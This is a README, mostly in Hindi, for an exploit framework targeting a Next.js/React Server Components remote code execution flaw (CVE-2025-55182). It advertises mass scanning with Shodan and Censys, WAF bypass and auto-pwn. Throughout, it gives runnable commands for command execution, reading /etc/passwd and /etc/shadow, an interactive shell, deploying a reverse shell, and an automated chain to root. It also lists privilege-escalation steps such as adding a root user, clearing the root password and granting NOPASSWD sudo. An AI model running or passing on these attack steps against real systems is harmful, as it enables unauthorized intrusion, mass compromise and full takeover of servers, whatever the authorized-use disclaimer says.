CVE-2025-55182 (React Server Components RCE) के लिए Elite exploitation टूलकिट। Async polymorphic payloads, उन्नत WAF/CDN बाईपास, proxy rotation, Shodan/Censys mass scan, auto-pwn + reverse shells, Nuclei templates, K8s lab और C2 dashboard। Sudeepa Wanigarathna द्वारा लिखित – केवल अधिकृत red team और penetration testing के लिए।
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
React2Shell Exploitation Framework v1.0
Author: Sudeepa Wanigarathna
Next.js Server Actions RCE भेद्यता (React2Shell) के लिए पेशेवर-ग्रेड शोषण फ्रेमवर्क। प्रारंभिक पहुंच से रूट विशेषाधिकार वृद्धि तक पूर्ण हमले की श्रृंखला प्रदर्शित करता है।
क्षमताएं:
# भेद्यता जांचें
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# कमांड निष्पादित करें
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# पूर्ण शोषण: RCE → गणना → रूट पहुंच
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # कोर शोषण इंजन (400+ लाइनें)
├── demo_exploit.py # स्वचालित हमला श्रृंखला (290+ लाइनें)
├── interactive_shell.py # इंटरैक्टिव शेल (280+ लाइनें)
├── reverse_shell_handler.py # रिवर्स शेल लिसनर (180+ लाइनें)
├── post_exploit/
│ ├── linux_enum.py # सिस्टम गणना (330+ लाइनें)
│ ├── priv_esc.py # विशेषाधिकार वृद्धि (320+ लाइनें)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # पूर्ण उपयोग दस्तावेज़ीकरण
├── QUICKSTART.md # त्वरित संदर्भ
└── BANNER.txt
# भेद्यता जांच
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# कमांड निष्पादित करें
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# विभिन्न पेलोड वेरिएंट
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# अस्पष्टीकरण के साथ
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# शेल लॉन्च करें
python3 interactive_shell.py --target http://127.0.0.1:3000
# उपलब्ध कमांड:
# - execute <cmd> : शेल कमांड निष्पादित करें
# - enum : पूर्ण गणना चलाएं
# - escalate : विशेषाधिकार वृद्धि का प्रयास करें
# - upload <local> <remote> : फ़ाइल अपलोड करें
# - download <remote> <local>: फ़ाइल डाउनलोड करें
# - shell <lhost> <lport>: रिवर्स शेल तैनात करें
# - info : सत्र जानकारी दिखाएं
# - exit : बाहर निकलें
# टर्मिनल 1: लिसनर शुरू करें
python3 reverse_shell_handler.py --lport 4444
# टर्मिनल 2: शेल तैनात करें
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# पूर्ण श्रृंखला: खोज → RCE → गणना → रूट
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
फ्रेमवर्क पूर्ण 6-चरणीय शोषण श्रृंखला लागू करता है:
id कमांड के साथ कोड निष्पादन की पुष्टि करें/etc/shadow पढ़कर और /root सूचीबद्ध करके रूट पहुंच साबित करेंSUID बाइनरी (GTFOBins)
लिखने योग्य /etc फ़ाइलें
/etc/passwd - नया रूट उपयोगकर्ता जोड़ें/etc/shadow - रूट पासवर्ड साफ़ करें/etc/sudoers - NOPASSWD sudo अनुदान देंDocker एस्केप
कर्नेल शोषण
Linux क्षमताएं
pip install -r requirements.txt
निर्भरताएं:
EXPLOITATION_GUIDE.md - उदाहरणों के साथ पूर्ण उपयोग मार्गदर्शिकाQUICKSTART.md - सामान्य कमांड के लिए त्वरित संदर्भचेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। केवल उन सिस्टम पर उपयोग करें जिनके मालिक आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। अपने जोखिम पर उपयोग करें।
यह फ्रेमवर्क निम्नलिखित के लिए डिज़ाइन किया गया है:
MIT लाइसेंस (केवल शैक्षिक उद्देश्य)
Sudeepa Wanigarathna
संस्करण: 1.0
अंतिम अद्यतन: दिसंबर 2025
विस्तृत उपयोग निर्देशों के लिए, EXPLOITATION_GUIDE.md देखें